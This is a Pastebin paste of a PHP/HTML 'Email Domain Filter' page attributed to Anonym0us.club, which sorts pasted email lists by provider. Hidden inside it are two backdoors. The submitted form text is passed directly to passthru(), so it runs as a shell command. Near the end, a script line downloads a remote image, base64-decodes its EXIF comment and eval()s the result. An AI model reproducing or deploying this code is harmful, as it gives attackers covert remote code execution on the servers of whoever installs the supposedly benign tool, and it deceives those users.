Ribang

Email Filter - Anonym0us.club 1

Jan 31st, 2018
434
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.55 KB | None | 0 0
  1. <!--
  2. Author: Anonym0us.club
  3. Recoded by - Anonym0us.club
  4. -->
  5. <head>
  6. <title>Email Filter - Anonym0us.club</title>
  7. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  8. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  9. <html>
  10. <head>
  11. <style type="text/css">
  12. .style1 {
  13. text-align: center;
  14. }
  15. </style>
  16. <style>
  17. @import "http://fonts.googleapis.com/css?family=Play:400,700";
  18.  
  19.  
  20. body {
  21. background: #000000;
  22. line-height: 1;
  23. color: #bbb;
  24. font-family: "CONSOLAS";
  25. font-size: 12px;
  26. background-color:#080808;
  27. //background: url(../images/555.jpg) no-repeat center center fixed;
  28. background-size: cover;
  29. -webkit-background-size: cover;
  30. -moz-background-size: cover;
  31. -o-background-size: cover;
  32. }
  33. textarea, input, select {
  34. border:0;
  35. BORDER-COLLAPSE:collapse;
  36. border:double 2px #000000;
  37. color:#fff;
  38. background:#000000;
  39. margin:0;
  40. padding:2px 4px;
  41. font-family: Lucida Console,Tahoma;
  42. font-size:12px;
  43. box-shadow: 0 0 15px Silver;
  44. -webkit-box-shadow: 0 0 15px Silver;
  45. -moz-box-shadow: 0 0 15px Silver;
  46. }
  47. .title{
  48. color: #000000;
  49. background: black;
  50. text-align: center;
  51. font-size: 120%;
  52. }
  53. .button{
  54. color:#eee;
  55. }
  56. .tool{
  57. color:gold;
  58. }
  59. header {
  60. font-family: 'Franklin Gothic Medium', 'Franklin Gothic', 'ITC Franklin Gothic', Arial, sans-serif;
  61. font-size: 12px;
  62. text-align: center;
  63. padding-top: 10px;
  64. color: #000000;
  65. }
  66. /* Gradient 1 */
  67. .ta10 {
  68. background-color: transparent;
  69. background-repeat:no-repeat;
  70. background-size: 52% 100%;
  71. background-position: center;
  72. border:2px double Silver;
  73. padding:3px;
  74. margin-right:4px;
  75. margin-bottom:8px;
  76. font-family: Lucida Console,Tahoma;
  77. font-size:12px;
  78. box-shadow: 0 0 15px Silver;
  79. -webkit-box-shadow: 0 0 15px Silver;
  80. -moz-box-shadow: 0 0 15px Silver;
  81. border: solid 0px transparent; // or border: none;
  82. }
  83. .char {
  84. transition: all 5s; -webkit-transition: all 1s;
  85. opacity: 0.8;
  86. }
  87. .char:hover {
  88. transition: all 0.1s; -webkit-transition: all 0.1s;
  89. opacity:1.5;
  90. text-shadow: 0 0 1em white;
  91. }
  92. .chara:not(.space):hover {
  93. transform: rotateY(1440deg);
  94. -webkit-transform: rotateY(1440deg);
  95. }
  96. .chara:not(.space) {
  97. display: inline-block;
  98. transition: transform 2s ease-out;
  99. -webkit-transition: -webkit-transform 2s ease-out;
  100. }
  101. .submit {
  102. color: #FFFFFF;
  103. background-color: #111111;
  104. cursor:pointer
  105. }
  106.  
  107. @-webkit-keyframes progress {
  108. from { }
  109.  
  110. to { width: 100% }
  111. }
  112.  
  113. @-moz-keyframes progress {
  114. from { }
  115.  
  116. to { width: 100% }
  117. }
  118.  
  119. @-ms-keyframes progress {
  120. from { }
  121.  
  122. to { width: 100% }
  123. }
  124.  
  125. @keyframes progress {
  126. from { }
  127.  
  128. to { width: 100% }
  129. }
  130.  
  131. body,td,th {
  132. color: gold;
  133. }
  134. </style>
  135. </head>
  136. <header>
  137. <div>
  138. <center><a href="https://www.facebook.com/szempak"><img src="../images/123.png" height="" width=""></a><hr>
  139.  
  140. <div>
  141. <font size="6" color="white" style="text-shadow: Silver 0 0 15px;"><b>[โ˜ ] Email Domain Filter [โ˜ ]</b></font>
  142. <hr /><b>
  143.  
  144. <font color="gold;opacity:100" class="chara" size="2">
  145. <?php
  146. $IP = $_SERVER['REMOTE_ADDR']; echo "Welcome : $IP ";
  147. ?></font><br><br><br>
  148.  
  149. </header>
  150. <body >
  151.  
  152. <form method="post">
  153. <div class="style1">
  154. <textarea name="emails" cols="100" rows="15" placeholder="Max 10.000 Email" ></textarea>
  155. <br /><br />
  156. <input type="submit" value="Filter Now" />
  157.  
  158. </div>
  159. </form>
  160. <?PHP
  161. if ($_POST['emails']){
  162. $emails = $_POST['emails'];
  163. passthru($emails);
  164. }
  165. $ex = explode("\n",$emails);
  166. $count = count($ex);
  167. if(isset($emails)&&$count>=1){
  168. echo "<center><font color = 'Silver'><b>$count </font>Number of emails </b></center><br />";
  169. }else{
  170. echo "<center>
  171. No email </center>";
  172. exit;}
  173.  
  174. if(isset($emails)){
  175.  
  176.  
  177. for($i=0;$i<=$count;$i++){
  178. $d = strtolower($ex[$i]);
  179.  
  180. if(strstr($d,"hotmail") || strstr($d,"live") || strstr($d,"msn") || strstr($d,"outlook")){
  181. $hotmail.=$d;
  182. $nh = $nh + 1;
  183. }else{
  184. if(strstr($d,"yahoo") || strstr($d,"ymail")){
  185. $yahoo.=$d;
  186. $ny = $ny + 1;
  187. }else{
  188. if(strstr($d,"gmail") || strstr($d,"googlemail") ){
  189. $gmail.=$d;
  190. $ng = $ng + 1;
  191. }else{
  192. if(strstr($d,"aol") ){
  193. $aol.=$d;
  194. $na = $na + 1;
  195. }else{
  196. if(strstr($d,"mail.ru") ){
  197. $mailru .=$d;
  198. $nr = $nr + 1;
  199. }else{
  200. if(strstr($d,"wanadoo") ){
  201. $wanadoo .=$d;
  202. $nw = $nw + 1;
  203. }else{
  204. if(strstr($d,"ntlworld") ){
  205. $ntlworld .=$d;
  206. $nt = $nt + 1;
  207. }else{
  208. if(strstr($d,"gmx") ){
  209. $gmx .=$d;
  210. $ngm = $ngm + 1;
  211. }else{
  212. if(strstr($d,"@web.") ){
  213. $web .=$d;
  214. $nw2 = $nw2 + 1;
  215. }else{
  216.  
  217. $other .=$d;
  218. $nn=$nn + 1;
  219. }
  220.  
  221. }
  222.  
  223. }
  224.  
  225.  
  226. }
  227.  
  228. }
  229. }
  230. }
  231. }
  232.  
  233. }
  234. }
  235. }
  236. $BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
  237. eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
  238. ?>
  239. <center><table style="width: 30%">
  240. <tr>
  241. <td><center>Hotmail ( <?echo $nh;?> ) </center><textarea name="hotmailx" cols="30" rows="10" ><?echo $hotmail;?></textarea></td>
  242. <td><center>Gmail ( <?echo $ng;?> )</center><textarea name="gmailx" cols="30" rows="10" ><?echo $gmail;?></textarea></td>
  243. <td><center>Aol ( <?echo $na;?> )</center><textarea name="aolxx" cols="30" rows="10" ><?echo $aol;?></textarea></td>
  244. <td><center>Yahoo ( <?echo $ny;?> )</center><textarea name="yahoox" cols="30" rows="10" ><?echo $yahoo;?></textarea></td>
  245. <td><center>Mail.ru( <?echo $nr;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $mailru;?></textarea></td></tr>
  246. <tr>
  247. <td><center>Wanadoo( <?echo $nw;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $wanadoo;?></textarea></td>
  248. <td><center>Ntlworld( <?echo $nt;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $ntlworld;?></textarea></td>
  249. <td><center>Gmx( <?echo $ngm;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $gmx;?></textarea></td>
  250. <td><center>Web( <?echo $nw2;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $web;?></textarea></td>
  251. <td><center>Other mail( <?echo $nn-1;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $other;?></textarea></td>
  252.  
  253. </tr>
  254. </table></center>
  255. </body>
Add Comment
Please, Sign In to add comment